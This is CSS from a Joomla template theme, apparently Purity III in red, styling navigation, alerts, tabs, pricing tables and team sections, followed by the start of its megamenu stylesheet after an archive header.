  background: #cc0000;
  color: #ffffff;
}
.pagenav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.pagenav > li {
  margin: 0;
  padding: 0;
  float: left;
}
.pagenav > li.pagenav-prev,
.pagenav > li.previous {
  margin-right: 10px;
}
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #dddddd;
  border-radius: 0px;
}
.pagenav li > a:hover,
.pagenav li > a:active,
.pagenav li > a:focus {
  background-color: #eeeeee;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #eeeeee;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: right;
  text-align: right;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  background-color: #d9edf7;
  border-color: #bce8f1;
  color: #3a87ad;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  background-color: #f2dede;
  border-color: #ebccd1;
  color: #b94a48;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.alert-error .alert-message {
  background: transparent;
  color: inherit;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 5px 0 0;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: right;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: right;
  }
}
div.calendar {
  width: 187px;
}
dl.tabs {
  border-bottom: 1px solid #d9d9d9;
  display: block;
  clear: both;
  margin-bottom: 0;
}
dl.tabs:before,
dl.tabs:after {
  content: " ";
  display: table;
}
dl.tabs:after {
  clear: both;
}
dl.tabs dt.tabs {
  border: 1px solid #d9d9d9;
  display: inline-block;
  padding: 10px 20px;
  margin-right: 5px;
  margin-bottom: -1px;
}
dl.tabs dt.tabs h3 {
  margin: 0;
  font-size: 14px;
}
dl.tabs dt.tabs h3 a {
  color: #444444;
  outline: none;
}
dl.tabs dt.tabs h3 a:hover,
dl.tabs dt.tabs h3 a:focus,
dl.tabs dt.tabs h3 a:active {
  color: #800000;
  text-decoration: none;
}
dl.tabs dt.tabs.open {
  border-bottom-color: #ffffff;
}
dl.tabs dt.tabs.open a {
  font-weight: bold;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #cccccc;
  height: 26px;
  border-radius: 0 3px 3px 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 0 3px 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #cccccc;
}
.btn-group .chzn-results {
  white-space: normal;
}

.page-header {
  padding-bottom: 20px;
  margin: 0 0 20px;
  border-bottom: 1px solid #eeeeee;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #eeeeee;
  margin: 0 0 20px;
  padding-bottom: 20px;
}
.page-subheader:before,
.page-subheader:after {
  content: " ";
  display: table;
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title h1 a:hover,
.article-header h1 a:hover,
.article-title h2 a:hover,
.article-header h2 a:hover,
.article-title h1 a:active,
.article-header h1 a:active,
.article-title h2 a:active,
.article-header h2 a:active,
.article-title h1 a:focus,
.article-header h1 a:focus,
.article-title h2 a:focus,
.article-header h2 a:focus {
  text-decoration: none;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
@media screen and (max-width: 767px) {
  .article-title,
  .article-header h1 {
    font-size: 24px;
  }
}
@media screen and (max-width: 767px) {
  h2.article-title,
  .article-header h2 {
    font-size: 24px;
  }
}
.item-title {
  font-weight: bold;
}
.jumbotron:before,
.jumbotron:after {
  content: " ";
  display: table;
}
.jumbotron:after {
  clear: both;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p {
  color: #666666;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 0px;
}
.jumbotron .btn {
  margin-top: 20px;
  margin-bottom: 20px;
}
.masthead {
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .masthead {
    padding-top: 80px;
    padding-bottom: 80px;
  }
  .masthead h1 {
    font-size: 84px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    padding: 15px 40px;
    font-size: 24px;
  }
}
.jumbotron-primary {
  background-color: #cc0000;
}
.jumbotron-primary h1,
.jumbotron-primary h2,
.jumbotron-primary h3 {
  color: #ffffff;
}
.jumbotron-primary p {
  color: #ffcccc;
}
.jumbotron-primary .btn-primary {
  border-color: #fff;
}
.page-masthead:before,
.page-masthead:after {
  content: " ";
  display: table;
}
.page-masthead:after {
  clear: both;
}
.page-masthead .jumbotron {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
  padding-top: 60px;
  padding-bottom: 60px;
  padding-left: 0;
  padding-right: 0;
}
@media screen and (max-width: 992px) {
  .page-masthead .jumbotron {
    padding-top: 40px;
    padding-bottom: 40px;
  }
  .page-masthead .jumbotron .container {
    padding: 0;
  }
}
@media screen and (max-width: 767px) {
  .page-masthead .jumbotron {
    padding-left: 20px;
  }
}
.label {
  border-radius: 0px;
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.thumbnail {
  padding: 0;
  margin-bottom: 40px;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-right: 10px;
}
.media > .pull-right {
  margin-left: 10px;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #ff9999;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.modal-backdrop.fade {
  opacity: 0;
  filter: alpha(opacity=0);
}
.modal-backdrop.in {
  opacity: 0.5;
  filter: alpha(opacity=50);
}
.modal-header {
  border-bottom: 0;
  padding: 20px 40px 0;
}
.modal-title {
  font-size: 35px;
}
.modal-body {
  padding: 10px 40px 20px;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}

.logo {
  position: absolute;
  top: 0;
  left: 0;
  padding: 0;
  margin: 0;
}
.logo a {
  background: transparent;
  color: #fff;
  text-decoration: none;
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo:hover a,
.logo a:hover,
.logo a:active,
.logo a:focus {
  background: #b30000;
  color: #ffffff;
  text-decoration: none;
}
@media screen and (min-width: 991px) {
  .logo {
    position: static;
  }
  .logo a {
    background: #b30000;
  }
  .logo:hover a,
  .logo a:hover,
  .logo a:active,
  .logo a:focus {
    color: #ffffff;
  }
}
.off-canvas-toggle + .container .navbar-header .logo {
  left: 55px;
  border-left: 1px solid #b30000;
}
@media screen and (min-width: 991px) {
  .off-canvas-toggle + .container .navbar-header .logo {
    border-left: 0;
  }
}
.logo-image > a {
  max-width: 160px;
  max-height: 55px;
}
.logo-image > a > img {
  max-width: 100%;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text {
  text-transform: uppercase;
  font-size: 18px;
}
.logo-text a {
  line-height: 55px;
  padding: 0 20px;
}
.logo-text .site-slogan {
  display: none;
}
.head-search {
  height: 55px;
  position: absolute;
  right: 0;
  margin: 0;
  z-index: 1000;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  background: #cc0000;
  border-left: 1px solid #b30000;
  border-right: 1px solid #b30000;
  position: relative;
}
@media screen and (min-width: 991px) {
  .head-search .search {
    background: #b30000;
  }
}
.head-search .search .fa-search {
  color: #ffcccc;
  content: "\f002";
  display: block;
  font-family: "FontAwesome";
  position: absolute;
  left: 20px;
  top: 19px;
  z-index: 1;
}
.head-search .search .fa-search:hover {
  z-index: 0;
}
.head-search .form-control {
  border: 0;
  background: transparent;
  color: #ffcccc;
  height: 54px;
  line-height: 35px;
  position: relative;
  margin: 0;
  padding: 10px 15px 10px 40px;
  width: 0;
  -webkit-transition: width 0.2s;
  -o-transition: width 0.2s;
  transition: width 0.2s;
}
@media screen and (min-width: 991px) {
  .head-search .form-control {
    height: 55px;
  }
}
.head-search .form-control:hover,
.head-search .form-control:active,
.head-search .form-control:focus {
  color: #ffffff;
  box-shadow: none;
}
.head-search .form-control:active,
.head-search .form-control:focus {
  width: 180px;
}
.head-search .form-control:-webkit-autofill {
  -webkit-box-shadow: 0 0 0 1000px #0067a2 inset;
  -webkit-text-fill-color: #ffffff;
}
.head-search .form-control::-moz-placeholder {
  color: #ffffff;
}
.navbar-toggle + .head-search {
  right: 55px;
  max-width: 57px;
}
@media screen and (max-width: 990px) {
  .navbar-toggle + .head-search {
    max-width: inherit;
  }
  .navbar-toggle + .head-search:hover,
  .navbar-toggle + .head-search:focus,
  .navbar-toggle + .head-search:active {
    max-width: none;
  }
  .navbar-toggle + .head-search:hover .form-control,
  .navbar-toggle + .head-search:focus .form-control,
  .navbar-toggle + .head-search:active .form-control {
    width: 180px;
  }
}
@media screen and (min-width: 991px) {
  .head-search,
  .navbar-toggle + .head-search {
    right: 15px;
    top: 0;
    max-width: none;
  }
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  color: #ffffff;
  background: transparent;
}
.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}
.chzn-container {
  max-width: 100%;
}
.chzn-container .chzn-single {
  max-width: 260px;
}
.ie8 .radio.t3onoff {
  border: 0;
}
.ie8 label.on,
.ie8 label.off {
  border: 1px solid #eeeeee;
}
.pagination > li > a,
.pagination > li > span {
  margin-bottom: 10px;
}
#eblog-wrapper {
  line-height: 1.625;
}
.com_weblinks .weblink-categories .page-header.item-title .btn {
  padding: 5px;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-minus {
  display: block;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-plus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-minus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-plus {
  display: block;
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
.t3-sl .t3-module {
  margin-bottom: 0;
}
.t3-sl .t3-module + .t3-module {
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  background: #f7f7f7;
  color: #666666;
}
.t3-footer:before,
.t3-footer:after {
  content: " ";
  display: table;
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footer-sl {
  padding: 20px 0;
}
.t3-footer-sl:before,
.t3-footer-sl:after {
  content: " ";
  display: table;
}
.t3-footer-sl:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .t3-footer-sl {
    padding: 40px 0;
  }
}
.t3-footer-sl .t3-module {
  background: #f7f7f7;
  color: #666666;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module .module-title {
  color: #444444;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module ul {
  list-style: none;
  margin-left: 0;
  margin-bottom: 0;
  padding-left: 0;
}
.t3-footer-sl .t3-module ul > li {
  line-height: 24px;
}
.t3-footer-sl .t3-module ul > li > a {
  color: #666666;
}
.t3-footer-sl .t3-module ul > li > a:hover,
.t3-footer-sl .t3-module ul > li > a:active,
.t3-footer-sl .t3-module ul > li > a:focus {
  color: #666666;
}
#back-to-top {
  z-index: 999;
  position: fixed;
  right: 20px;
  top: auto;
}
#back-to-top.affix {
  bottom: 40px;
}
#back-to-top a {
  outline: none;
}
#back-to-top i {
  font-size: 28px;
}
.t3-copyright {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  content: " ";
  display: table;
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  content: " ";
  display: table;
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: right;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  display: inline-block;
}
.mod-preview-info {
  z-index: 2000;
}
#ezblog-body .blog-text p,
#ezblog-body .blog-text li {
  line-height: 1.625;
}
.features-intro .t3-content {
  padding-top: 0;
  padding-bottom: 0;
}
.row-feature {
  border-top: 1px solid #eeeeee;
  padding: 40px 0;
  font-size: 16px;
  color: #666666;
  line-height: 1.5;
}
.page-masthead .row-feature {
  padding: 40px 0;
}
@media screen and (min-width: 992px) {
  .row-feature {
    padding: 60px 0;
  }
  .page-masthead .row-feature {
    padding: 100px 0;
  }
}
.row-feature h1,
.row-feature h2,
.row-feature h3 {
  line-height: 1.15;
  color: #444444;
}
.row-feature h1 {
  margin-top: 0;
  margin-bottom: 60px;
  font-weight: 300;
}
@media screen and (min-width: 768px) {
  .row-feature h1 {
    font-size: 84px;
  }
}
.row-feature h1 + p {
  margin-top: -55px;
}
.row-feature h2 {
  margin-top: 0;
  margin-bottom: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature h2 {
    font-size: 42px;
  }
}
.row-feature h3 {
  margin-top: 20px;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .row-feature h3 {
    font-size: 27.6px;
  }
}
.row-feature h3 + p {
  margin-top: -10px;
}
.row-feature .feature-ct {
  width: 100%;
  padding-top: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image + .feature-ct {
    width: 50%;
    float: right;
    padding-left: 20px;
  }
  .row-feature .pull-right.item-image + .feature-ct {
    width: 50%;
    float: left;
    padding-right: 20px;
  }
}
.row-feature.text-center {
  text-align: center;
}
.row-feature.row-feature-alt,
.row-feature:nth-child(even) {
  background: #f7f7f7;
}
.row-feature.row-feature-primary {
  background: #cc0000;
  color: #ffcccc;
}
.row-feature.row-feature-primary h1,
.row-feature.row-feature-primary h2,
.row-feature.row-feature-primary h3 {
  color: #ffffff;
}
.row-feature.row-feature-primary .feature-ct,
.row-feature.row-feature-primary p {
  color: #ffcccc;
}
.row-feature.row-feature-primary .btn-primary {
  border-color: #fff;
}
.row-feature.row-feature-primary + .row-feature-primary {
  border-top: 1px solid #990000;
}
.row-feature .row-feature-narrow {
  padding-top: 20px;
  padding-bottom: 20px;
}
.row-feature:first-child {
  border-top: 0;
}
.row-feature .item-image {
  width: 100%;
  float: none;
  margin-bottom: 20px;
}
.row-feature .item-image img {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image,
  .row-feature .pull-right.item-image {
    max-width: 50%;
    min-width: 25%;
    margin-bottom: 0;
  }
  .row-feature .pull-left.item-image {
    float: left;
    text-align: left;
    padding-right: 20px;
  }
  .row-feature .pull-right.item-image {
    float: right;
    text-align: right;
    padding-left: 20px;
  }
}
.row-feature .page-header {
  border: 0;
  margin: 0 0 20px;
  padding: 0;
}
.row-feature .jumbotron {
  background: transparent;
  position: relative;
  margin-top: 0;
  margin-bottom: 20px;
  padding-top: 0;
  padding-bottom: 0;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .row-feature .jumbotron {
    margin-bottom: 60px;
  }
}
.row-feature .gallery .thumbnail {
  border: 0;
  padding: 0;
}
.row-feature .gallery .thumbnail a {
  display: block;
  border: 1px solid #eeeeee;
  padding: 3px;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.row-feature .gallery .thumbnail a img {
  width: 100%;
  padding: 0;
}
.row-feature .gallery .thumbnail a:hover,
.row-feature .gallery .thumbnail a:focus,
.row-feature .gallery .thumbnail a:active {
  border-color: #bbbbbb;
}
.row-feature .gallery .thumbnail a:hover img,
.row-feature .gallery .thumbnail a:focus img,
.row-feature .gallery .thumbnail a:active img {
  opacity: .7;
}
.support-policy .row-support-policy {
  margin-bottom: 20px;
}
.support-policy .policy-item {
  margin-bottom: 20px;
  border: 1px solid #eeeeee;
}
.support-policy .policy-item .col-type {
  position: relative;
  height: 100px;
  border-bottom: 1px solid #eeeeee;
  background: #f7f7f7;
}
.support-policy .policy-item .col-type h3 {
  position: absolute;
  bottom: 10px;
  left: 20px;
}
.support-policy .policy-item .col-detail {
  height: 200px;
  padding: 20px;
}
.support-policy .policy-item .col-level {
  height: 80px;
  background: #444444;
  color: #fff;
  position: relative;
}
.support-policy .policy-item .col-level .face,
.support-policy .policy-item .col-level .count-up,
.support-policy .policy-item .col-level > strong {
  height: 80px;
  line-height: 80px;
}
.support-policy .policy-item .col-level .level-info {
  width: 160px;
  position: absolute;
  left: 0;
  bottom: 0;
}
.support-policy .policy-item .col-level .level-info .face {
  background-image: url(../../../../images/emoticons.png);
  background-repeat: no-repeat;
  background-color: rgba(0, 0, 0, 0.35);
  display: table-cell;
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
}
.support-policy .policy-item .col-level .level-info .count-up {
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
  background-color: rgba(0, 0, 0, 0.15);
  display: table-cell;
  vertical-align: middle;
  text-align: center;
  font-size: 18px;
  font-weight: bold;
}
.support-policy .policy-item .col-level strong {
  width: 100%;
  color: #ffffff;
  display: block;
  float: left;
  font-weight: bold;
  padding-left: 180px;
  font-size: 18px;
}
.support-policy .policy-item .col-level.level-1 strong {
  background: #3e9b52;
}
.support-policy .policy-item .col-level.level-1 .face {
  background-position: 0px 0px;
}
.support-policy .policy-item .col-level.level-2 strong {
  background: #2f773f;
}
.support-policy .policy-item .col-level.level-2 .face {
  background-position: 0px -80px;
}
.support-policy .policy-item .col-level.level-3 strong {
  background: #ffcc00;
}
.support-policy .policy-item .col-level.level-3 .face {
  background-position: 0px -160px;
}
.support-policy .policy-item .col-level.level-4 strong {
  background: #cca300;
}
.support-policy .policy-item .col-level.level-4 .face {
  background-position: 0px -240px;
}
.support-policy .policy-item .col-level.level-5 strong {
  background-color: #ff8800;
}
.support-policy .policy-item .col-level.level-5 .face {
  background-position: 0px -320px;
}
.support-policy .policy-item .col-level.level-6 strong {
  background: #cc0000;
}
.support-policy .policy-item .col-level.level-6 .face {
  background-position: 0px -400px;
}
.support-policy:hover {
  background: #ffffff;
  border-color: #eeeeee;
}
.support-policy:hover .level-info .face {
  top: -70px;
}
.support-policy:hover .level-info .count-up {
  bottom: 0;
}
.support-policy.style2 {
  margin-bottom: 60px;
}
.support-policy .row-heading {
  background: #444444;
  color: #ffffff;
  overflow: hidden;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading {
    display: table;
    width: 100%;
  }
}
.support-policy .row-heading > div {
  border-right: 1px solid #5e5e5e;
  font-size: 12px;
  font-weight: bold;
  padding: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading > div {
    font-size: 15px;
    display: table-cell;
  }
}
.support-policy .row-body {
  border-left: 1px solid #eeeeee;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body {
    display: table;
    width: 100%;
    margin-bottom: 0;
  }
}
.support-policy .row-body > div {
  border-right: 1px solid #eeeeee;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 20px;
  vertical-align: middle;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body > div {
    display: table-cell;
    float: none;
  }
}
.support-policy .row-body .col-type {
  background: #444444;
  color: #ffffff;
  font-size: 16px;
  font-weight: bold;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body .col-type {
    background: transparent;
    color: #444444;
  }
}
.support-policy .row-body .col-level {
  font-size: 32px;
  text-align: center;
}
.support-policy .row-body .col-status {
  border-bottom: 0;
}
.support-policy .row-body .col-status .face {
  background-image: url(../../../../images/emoticons.png);
  background-repeat: no-repeat;
  display: block;
  height: 80px;
  margin: 0 auto;
  width: 80px;
}
.support-policy .row-body .col-status strong {
  color: #ffffff;
  display: block;
  padding: 3px 0;
  text-align: center;
}
.support-policy .row-body.level-1 .col-status {
  background: #3e9b52;
}
.support-policy .row-body.level-1 .col-status .face {
  background-position: 0px 0px;
}
.support-policy .row-body.level-2 .col-status {
  background: #44aa5a;
}
.support-policy .row-body.level-2 .col-status .face {
  background-position: 0px -80px;
}
.support-policy .row-body.level-3 .col-status {
  background: #4bb762;
}
.support-policy .row-body.level-3 .col-status .face {
  background-position: 0px -160px;
}
.support-policy .row-body.level-4 .col-status {
  background: #59bd6f;
}
.support-policy .row-body.level-4 .col-status .face {
  background-position: 0px -240px;
}
.support-policy .row-body.level-5 .col-status {
  background: #68c37b;
}
.support-policy .row-body.level-5 .col-status .face {
  background-position: 0px -320px;
}
.support-policy .row-body.level-6 .col-status {
  background: #77c888;
}
.support-policy .row-body.level-6 .col-status .face {
  background-position: 0px -400px;
}
.support-policy .row-alt {
  background: #f7f7f7;
}
.support-policy .support-yes {
  color: #3e9b52;
}
.support-policy .support-no {
  color: #e1e1e1;
}
.pricing-table {
  padding-top: 40px;
  padding-bottom: 100px;
}
.pricing-table .col {
  margin-bottom: 40px;
}
@media (min-width: 992px) {
  .pricing-table .col {
    margin-bottom: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.no-padding {
    padding: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.shadow {
    box-shadow: 0 0 0 5px rgba(0, 0, 0, 0.2);
  }
}
.pricing-table .col .big-number {
  display: inline-block;
  font-size: 70px;
}
.pricing-table .col .big-number sup {
  font-size: 28px;
  top: -1em;
}
.pricing-table .col .btn {
  font-size: 20px;
  padding: 10px 20px;
}
.pricing-table .col .col-header {
  background: #666666;
  color: #ffffff;
  padding: 10px 20px;
}
.pricing-table .col ul {
  border: 1px solid #eeeeee;
  border-bottom: 0;
  list-style: none;
  margin: 0;
  padding: 0;
}
.pricing-table .col ul li {
  border-bottom: 1px solid #eeeeee;
  font-size: 16px;
  padding: 10px 20px;
  text-align: center;
}
.pricing-table .col ul li.row1 {
  background: #f7f7f7;
}
.pricing-table .col ul li i {
  color: #3e9b52;
  font-size: 18px;
}
.pricing-table .col ul li.no i {
  color: #cc0000;
}
.pricing-table .col ul li.no {
  color: #999999;
  text-decoration: line-through;
}
.pricing-table .col .col-footer {
  background: #eeeeee;
  border: 1px solid #d5d5d5;
  padding: 20px;
}
.pricing-table .col-feature {
  z-index: 200;
}
@media screen and (min-width: 992px) {
  .pricing-table .col-feature {
    margin-top: -20px;
  }
}
.pricing-table .col-feature .col-header {
  background: #cc0000;
  padding: 20px 20px;
}
.pricing-table.style2 .col:first-child .col-header {
  border-radius: 5px 0 0 0;
}
.pricing-table.style2 .col:first-child .col-footer {
  border-radius: 0 0 0 5px;
}
.pricing-table.style2 .col:last-child .col-header {
  border-radius: 0 5px 0 0;
}
.pricing-table.style2 .col:last-child .col-footer {
  border-radius: 0 0 5px 0;
}
.pricing-table.style2 .col-feature {
  border-radius: 5px;
}
.pricing-table.style2 .col-feature .col-header {
  border-radius: 5px 5px 0 0;
}
.pricing-table.style2 .col-feature .col-footer {
  border-radius: 0 0 5px 5px;
}
.our-team .lead {
  margin-bottom: 60px;
}
.our-team .thumbnail {
  text-align: center;
  border: 0;
  padding: 0 20px;
}
.our-team .thumbnail .caption {
  padding-bottom: 20px;
}
.our-team .thumbnail h3 {
  margin-bottom: 5px;
}
.our-team .thumbnail .btn {
  border-radius: 50%;
  height: 32px;
  line-height: 32px;
  margin: 0 2px;
  padding: 0;
  text-align: center;
  width: 32px;
}
.our-team .thumbnail .btn:hover {
  background: #cc0000;
  border-color: #cc0000;
  color: #ffffff;
}
.control-group .controls script + .row-fluid {
  margin-left: 0;
}
.control-group .controls script + .row-fluid + .row-fluid {
  margin-left: 0;
}
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
}
.video-wrapper iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}PKԜ�\���Vp7p7,purity_iii/local/css/themes/red/megamenu.cssnu&1i�.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu.open > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-left: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-left: -5px;
  margin-right: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
